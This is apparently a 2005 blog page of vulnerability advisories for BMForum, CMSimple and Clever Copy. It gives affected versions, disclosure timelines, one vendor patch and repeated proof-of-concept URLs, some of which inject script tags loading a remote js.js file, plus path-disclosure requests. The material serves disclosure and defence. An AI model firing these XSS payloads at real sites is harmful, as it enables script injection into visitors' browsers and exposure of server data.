################################################
Multiple Cross site scripting in BMForum
vendor url:http://www.bmforum.com/
Advisore:http://lostmon.blogspot.com/2005/07/
multiple-cross-site-scripting-in.html
Vendor notify:yes Exploit available:yes
OSVDB ID:18306,18307,18308,18309,18310,18311,18312,18313,18314
Secunia: SA16224
BID: 14396
################################################
BMForum contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.
####################
VERSIONS
####################
BMForum Datium! 3.0 RC4
BMForum Datium! 3.0 RC3
BMForum Datium! 3.0 RC2
BMForum Datium! 3.0 RC1
BMForum Plus! 3.0 RC4
BMForum Plus! 3.0 RC3
BMForum Plus! 3.0 RC2
BMForum Plus! 3.0 RC1
BMForum Plus!MX 3.0.0.5
BMForum Plus! 2.6.1
###################
Solution:
###################
No solution at this time.
###################
Timeline:
###################
Discovered: 21-07-2005
vendor notify:25-07-2005
Disclosure:27-07-2005
###################
Proof of XSS
####################
####################
topic.php
####################
http://[VICTIM]/bmb/topic.php?forumid=6&filename=38496&page=2[XSS-CODE]
http://[VICTIM]/bmb/topic.php?forumid=6&filename=38496[XSS-CODE]&page=2
http://[VICTIM]/topic.php?filename=1923[XSS-CODE]
#################
forums.php
#################
http://[VICTIM]/bmb/forums.php?forumid=6[XSS-CODE]
http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime[XSS-CODE]&jinhua=&page=
http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime&jinhua=[XSS-CODE]&page=
http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime&jinhua=&page=[XSS-CODE]
###################
post.php
###################
http://[VICTIM]/post.php?forumid=2\[XSS-CODE]
###################
announcesys.php
###################
http://[VICTIM]/announcesys.php?forumid=0[XSS-CODE]
#################
Others
#################
http://[VICTIM]/datafile/regipbans.php //ips baned.
http://[VICTIM]/bmb/datafile/sendmail.php // full path disclosure.
http://[VICTIM]/post_global.php //full path disclosure
http://[VICTIM]/bmb/datafile/bbslog2.txt //data disclosure
http://[VICTIM]/bmb/bbslog.txt // data disclosure
################### €nd ######################
thnx to estrella to be my ligth.
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
CMSimple 'search' variable XSS
Thursday, July 21, 2005
##############################################
CMSimple 'search' variable XSS
Vendor urL:http://www.cmsimple.dk/
Advisory:http://lostmon.blogspot.com/2005/07/
cmsimple-search-variable-xss.html
vendor fix:http://www.cmsimple.dk/
forum/viewtopic.php?t=2470
Vendor confirmed:YES exploit available:yes
OSVDB ID: 18128
Secunia: SA16147
BID: 14346
Securitytracker: 1014556
##############################################
CMSimple is a simple content management system; for the smart
maintenance of small commercial or private sites.
It is simple - small - smart!
CMSimple contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'search' variable upon submission to 'index.php' script.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.
Index.php file contains only a include to cmsimple/cms.php file.
#############
VERSIONS
#############
CMSimple 2.4 and earlier versions
#############
Solution
#############
vendor fix:
http://www.cmsimple.dk/forum/viewtopic.php?t=2470
Fix:
function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.$search;
should be replaced with:
function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.htmlspecialchars(stripslashes($search));
Will be fixed in next beta.
#############
Timeline
#############
discovered: 13-07-2005
vendor notify:20-07-2005
vendor response:21-07-2005
vendor fix:21-07-2005
disclosure:21-07-2005
################
Proof of concept
################
http://[victim]/index.php?&print&function=search&search="><script src="http://www.drorshalev.com/dev/injection/js.js"></script>
http://[victim]/?function=search&search=[XSS-CODE]
http://[victim]/?&print&function=search&search=[XSS-CODE]
http://[victim]/?License&function=search&search=[XSS-CODE]
http://[victim]/?Resellers&function=search&search=[XSS-CODE]
http://[victim]/?&guestbook&function=search&search=[XSS-CODE]
###################### €nd #########################
Thnx to estrella to be my ligth
thnx to http://www.drorshalev.com/ for hosting 'js.js' script
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
CMSimple 'search' variable XSS
Vendor urL:http://www.cmsimple.dk/
Advisory:http://lostmon.blogspot.com/2005/07/
cmsimple-search-variable-xss.html
vendor fix:http://www.cmsimple.dk/
forum/viewtopic.php?t=2470
Vendor confirmed:YES exploit available:yes
OSVDB ID: 18128
Secunia: SA16147
BID: 14346
Securitytracker: 1014556
##############################################
CMSimple is a simple content management system; for the smart
maintenance of small commercial or private sites.
It is simple - small - smart!
CMSimple contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'search' variable upon submission to 'index.php' script.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.
Index.php file contains only a include to cmsimple/cms.php file.
#############
VERSIONS
#############
CMSimple 2.4 and earlier versions
#############
Solution
#############
vendor fix:
http://www.cmsimple.dk/forum/viewtopic.php?t=2470
Fix:
function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.$search;
should be replaced with:
function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.htmlspecialchars(stripslashes($search));
Will be fixed in next beta.
#############
Timeline
#############
discovered: 13-07-2005
vendor notify:20-07-2005
vendor response:21-07-2005
vendor fix:21-07-2005
disclosure:21-07-2005
################
Proof of concept
################
http://[victim]/index.php?&print&function=search&search="><script src="http://www.drorshalev.com/dev/injection/js.js"></script>
http://[victim]/?function=search&search=[XSS-CODE]
http://[victim]/?&print&function=search&search=[XSS-CODE]
http://[victim]/?License&function=search&search=[XSS-CODE]
http://[victim]/?Resellers&function=search&search=[XSS-CODE]
http://[victim]/?&guestbook&function=search&search=[XSS-CODE]
###################### €nd #########################
Thnx to estrella to be my ligth
thnx to http://www.drorshalev.com/ for hosting 'js.js' script
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Clever copy Path disclosure and XSS
Monday, July 18, 2005
################################################
Clever copy Path disclosure and XSS
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-path-disclosure-and-xss.html
vendor notify: yes exploit available:yes
OSVDB ID: 18349,18350,18351,18352,18353,18354,18355,
18356,18357,18358,18359,18360,18361
Secunia: SA16236
BID:14395
################################################
Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System
Clever Copy contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'searchtype' and 'searchterm' variables upon submission to
'results.php' and 'categorysearch.php' scripts.This could allow a user
to create a specially crafted URL that would execute arbitrary code in
a user's browser within the trust relationship between the browser and
the server, leading to a loss of integrity
##############
VERSIONS
##############
Clever Copy version 2.0a
Clever Copy version 2.0
##############
SOLUTION
##############
No solution at this time
##############
TIMELINE
##############
Discovered: 15-07-2005
Vendor notify: 18-07-2005
Vendor response: 18-07-2005
Disclosure: 19-07-2005
##############
EXPLOITS
##############
http://[VICTIM]/results.php?searchtype="><script src="
http://www.drorshalev.com/dev/injection/js.js"></script>
category&searchterm=Announcements
http://[VICTIM]/results.php?searchtype=category&searchterm=">
<scriptsrc="http://www.drorshalev.com/dev/injection/js.js&
quot;></script>Announcements
http://[VICTIM]/results.php?start=0&searchtype="><script
src="http://www.drorshalev.com/dev/injection/js.js"><
/script>category&searchterm=Announcements
http://[VICTIM]/results.php?start=0&searchtypecategory&searchterm=
Announcements="><script src="http://www.drorshalev
.com/dev/injection/js.js"></script>
http://[VICTIM]/categorysearch.php?star=0&searchtype="><
script src="http://www.drorshalev.com/dev/injection/js.js
"></script>category&searchterm=Announcements
http://[VICTIM]/categorysearch.php?star=0&searchtypecategory&
searchterm=Announcements"><script src="http://
www.drorshalev.com/dev/injection/js.js"></script>
################################
direct request path disclosure:
################################
http://[VICTIM]/ticker.php
http://[VICTIM]/menu.php
http://[VICTIM]/banned.php
http://[VICTIM]/endlayout.php
http://[VICTIM]/randomhlinesblock.php
http://[VICTIM]/showlast.php
http://[VICTIM]/showlast5class1.php
http://[VICTIM]/showlast5phorum.php
http://[VICTIM]/showlast5phorumblock.php
http://[VICTIM]/showlastforumbb2.php
http://[VICTIM]/showlastforumbb2block.php
######################## €nd #############################
Thnx to estrella to be my ligth
thnx to http://www.drorshalev.com/ for hosting 'js.js' script
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Clever copy Path disclosure and XSS
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-path-disclosure-and-xss.html
vendor notify: yes exploit available:yes
OSVDB ID: 18349,18350,18351,18352,18353,18354,18355,
18356,18357,18358,18359,18360,18361
Secunia: SA16236
BID:14395
################################################
Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System
Clever Copy contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'searchtype' and 'searchterm' variables upon submission to
'results.php' and 'categorysearch.php' scripts.This could allow a user
to create a specially crafted URL that would execute arbitrary code in
a user's browser within the trust relationship between the browser and
the server, leading to a loss of integrity
##############
VERSIONS
##############
Clever Copy version 2.0a
Clever Copy version 2.0
##############
SOLUTION
##############
No solution at this time
##############
TIMELINE
##############
Discovered: 15-07-2005
Vendor notify: 18-07-2005
Vendor response: 18-07-2005
Disclosure: 19-07-2005
##############
EXPLOITS
##############
http://[VICTIM]/results.php?searchtype="><script src="
http://www.drorshalev.com/dev/injection/js.js"></script>
category&searchterm=Announcements
http://[VICTIM]/results.php?searchtype=category&searchterm=">
<scriptsrc="http://www.drorshalev.com/dev/injection/js.js&
quot;></script>Announcements
http://[VICTIM]/results.php?start=0&searchtype="><script
src="http://www.drorshalev.com/dev/injection/js.js"><
/script>category&searchterm=Announcements
http://[VICTIM]/results.php?start=0&searchtypecategory&searchterm=
Announcements="><script src="http://www.drorshalev
.com/dev/injection/js.js"></script>
http://[VICTIM]/categorysearch.php?star=0&searchtype="><
script src="http://www.drorshalev.com/dev/injection/js.js
"></script>category&searchterm=Announcements
http://[VICTIM]/categorysearch.php?star=0&searchtypecategory&
searchterm=Announcements"><script src="http://
www.drorshalev.com/dev/injection/js.js"></script>
################################
direct request path disclosure:
################################
http://[VICTIM]/ticker.php
http://[VICTIM]/menu.php
http://[VICTIM]/banned.php
http://[VICTIM]/endlayout.php
http://[VICTIM]/randomhlinesblock.php
http://[VICTIM]/showlast.php
http://[VICTIM]/showlast5class1.php
http://[VICTIM]/showlast5phorum.php
http://[VICTIM]/showlast5phorumblock.php
http://[VICTIM]/showlastforumbb2.php
http://[VICTIM]/showlastforumbb2block.php
######################## €nd #############################
Thnx to estrella to be my ligth
thnx to http://www.drorshalev.com/ for hosting 'js.js' script
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Clever copy 'calendar.php' 'yr' variable cross site scripting
Friday, July 15, 2005
################################################
Clever copy 'calendar.php' 'yr' variable cross site scripting
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-calendarphp-yr-variable.html
vendor notify: yes exploit available:yes
OSVDB ID:17919
Securitytracker: 1014492
BID: 14278
################################################
Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System
Clever Copy contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate 'yr'
variable upon submission to 'calendar.php' script.This could allow a
user to create a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship between
the browser and the server, leading to a loss of integrity
##############
VERSIONS
##############
Clever Copy version 2.0a
Clever Copy version 2.0
##############
SOLUTION
##############
No solution at this time
##############
TIMELINE
##############
Discovered: 12-07-2005
Vendor notify: 13-07-2005
Vendor response:14-07-2005
Disclosure: 15-07-2005
##############
EXPLOIT
##############
http://[victim]/calendar.php?mth=3&yr=2006"><script src="http://www.drorshalev.com/dev/injection/js.js"></script>
######################## €nd #############################
Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente...
Clever copy 'calendar.php' 'yr' variable cross site scripting
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-calendarphp-yr-variable.html
vendor notify: yes exploit available:yes
OSVDB ID:17919
Securitytracker: 1014492
BID: 14278
################################################
Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System
Clever Copy contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate 'yr'
variable upon submission to 'calendar.php' script.This could allow a
user to create a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship between
the browser and the server, leading to a loss of integrity
##############
VERSIONS
##############
Clever Copy version 2.0a
Clever Copy version 2.0
##############
SOLUTION
##############
No solution at this time
##############
TIMELINE
##############
Discovered: 12-07-2005
Vendor notify: 13-07-2005
Vendor response:14-07-2005
Disclosure: 15-07-2005
##############
EXPLOIT
##############
http://[victim]/calendar.php?mth=3&yr=2006"><script src="http://www.drorshalev.com/dev/injection/js.js"></script>
######################## €nd #############################
Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente...
Subscribe to:
Posts (Atom)